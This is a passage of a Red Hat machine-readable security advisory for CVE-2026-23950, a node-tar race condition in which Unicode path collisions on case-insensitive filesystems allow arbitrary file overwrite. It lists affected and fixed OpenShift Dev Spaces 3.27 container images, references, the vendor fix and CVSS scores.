"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431036"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in node-tar, a library for Node.js. This race condition vulnerability occurs due to incomplete handling of Unicode path collisions within the `path-reservations` system on case-insensitive filesystems, such as macOS APFS. A remote attacker can exploit this by providing a specially crafted tar archive containing filenames that cause these collisions, bypassing internal concurrency safeguards. Successful exploitation can lead to arbitrary file overwrite.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Important for Red Hat products. The `node-tar` library is susceptible to a race condition due to incomplete handling of Unicode path collisions, which can lead to arbitrary file overwrites via symlink poisoning. However, this issue primarily affects case-insensitive or normalization-insensitive filesystems. Red Hat Enterprise Linux and other Red Hat products typically utilize case-sensitive filesystems, which may limit the direct impact of this flaw in default configurations.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-23950"
},
{
"category": "external",
"summary": "RHBZ#2431036",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431036"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-23950",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23950"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-23950",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23950"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6",
"url": "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w",
"url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w"
}
],
"release_date": "2026-01-20T00:40:48.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
